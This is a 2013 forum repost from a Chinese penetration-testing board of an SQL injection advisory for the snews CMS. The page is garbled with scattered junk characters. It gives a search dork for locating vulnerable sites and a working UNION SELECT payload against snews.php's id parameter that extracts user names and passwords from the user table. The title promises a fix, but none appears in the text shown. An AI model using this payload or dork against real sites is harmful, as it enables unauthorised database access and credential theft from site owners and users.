中国网络渗透测试联盟
标题:
CMS snews SQL注射及修复
[打印本页]
作者:
admin
时间:
2013-1-23 08:55
标题:
CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
. e- }# p& G3 {* D3 o+ Z% J
作者: By onestree
& Z6 r3 n- p5 B$ a9 ?* `
下载地址 :
http://snewscms.com/
9 @6 d; I/ N s' |- a- o9 I- }
测试平台 : ubuntu 12.10 / win 7
) }0 H N# N" m3 w0 M4 b, }
关键词: inurl:"tanyakan pada rumput yang bergoyang"
5 V' v* j: ^, v @8 q; w: w3 d, t
2 V/ W3 @; S3 s5 c
4 p: Z. A( x3 \. P, a
*************************************************************
# A' J# }. a6 n' m+ R' l% a8 W& S- q9 Z1 T
: M9 D/ {8 Z: z7 S y+ E
SQL poc:
1 V! k; ^8 ^$ K9 G: h0 E7 P
) W, Z% d# L: J% V$ ^
http://www.2cto.com
/snews/snews.php?act=shownews&id=[SQL]
- B# E$ B" ~( E2 s/ V3 t
4 l5 Q, r; g* A8 v v) L
示例
u: x6 ~. p. K. S$ P' ?
' j" w ~' L: a( n2 n7 _8 p8 D! Y
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
% L, Z& y+ t8 v
' n5 Z! a( Z7 o* p q6 o
3 A3 z0 i/ {: q! _! i8 D: [5 Z2 d
致谢:
, ~9 c v/ i- d8 i9 y' U
# Y9 U$ j' R Y9 k4 D
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
4 Z- z$ \5 |! o# R( l: s
; ~5 ]' m! ^8 v2 z3 D. |" ?' v
indonesiancoder - moeslimh4x0r - go-coder
$ K: @# D" E. o5 W2 [' f
" r* k% x1 z1 G( K9 ^
spesial my hunny :*
- j* S9 ^$ }4 f& ]" ] C
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2